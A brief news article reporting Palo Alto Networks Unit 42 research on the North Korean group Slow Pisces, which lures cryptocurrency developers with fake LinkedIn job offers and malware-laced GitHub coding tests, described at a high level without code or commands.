Slow Pisces Tricks Crypto Devs With Fake Job Offers

Image by Mohammad Rahmani, from Unsplash

Slow Pisces Tricks Crypto Devs With Fake Job Offers

Reading time: 2 min

Last Updated: Apr 14, 2025

A North Korean hacking group known as Slow Pisces is tricking cryptocurrency developers into running malicious code disguised as job application challenges.

In a rush? Here are the quick facts:

  • Malware activates after checking the victim’s location and system configuration.
  • Malware runs in memory, leaving no trace on hard drives.
  • RN Stealer collects usernames, apps, and directories from macOS systems.

The group, also known as Jade Sleet or TraderTraitor, has stolen over $1 billion in crypto assets and continues to launch sophisticated attacks aimed at generating income for the DPRK regime.

According to cybersecurity researchers at Palo Alto Networks’ Unit 42, Slow Pisces contacts developers on LinkedIn pretending to be recruiters. After engaging in conversation, they send a fake job description in a PDF. If the victim applies, they’re sent a coding test that includes a “real project” hosted on GitHub. That project is laced with malware.

These fake projects often appear legitimate and even pull data from real websites like Wikipedia. But hidden among the sources is one malicious site controlled by the hackers. The malware is only activated after confirming the target’s location and system details, allowing Slow Pisces to avoid detection.

Instead of using obvious hacking tricks that security systems can easily spot, the attackers used a sneakier method called YAML deserialization. Basically, they hide dangerous code inside what looks like harmless setup files, making it harder to detect.

Once installed, the malware runs in memory and doesn’t leave traces on the hard drive. It downloads additional malware, named RN Loader and RN Stealer. RN Loader collects basic system data, while RN Stealer gathers more sensitive info like usernames, installed apps, and directory contents, especially from macOS systems.

Palo Alto Networks reported the malicious LinkedIn and GitHub accounts. Both platforms responded:

“GitHub and LinkedIn removed these malicious accounts for violating our respective terms of service […] We continue to evolve and improve our processes and encourage our customers and members to report any suspicious activity.”

Security experts recommend developers stay cautious of unsolicited coding challenges and check URLs linked in job tests.

Did you like this article? Rate it!
I hated it I don't really like it It was ok Pretty good! Loved it!

We're thrilled you enjoyed our work!

As a valued reader, would you mind giving us a shoutout on Trustpilot? It's quick and means the world to us. Thank you for being amazing!

Rate us on Trustpilot
0 Voted by 0 users
Title
Comment
Thanks for your feedback
Loader
Please wait 5 minutes before posting another comment.
Comment sent for approval.

Leave a Comment

Loader
Loader Show more...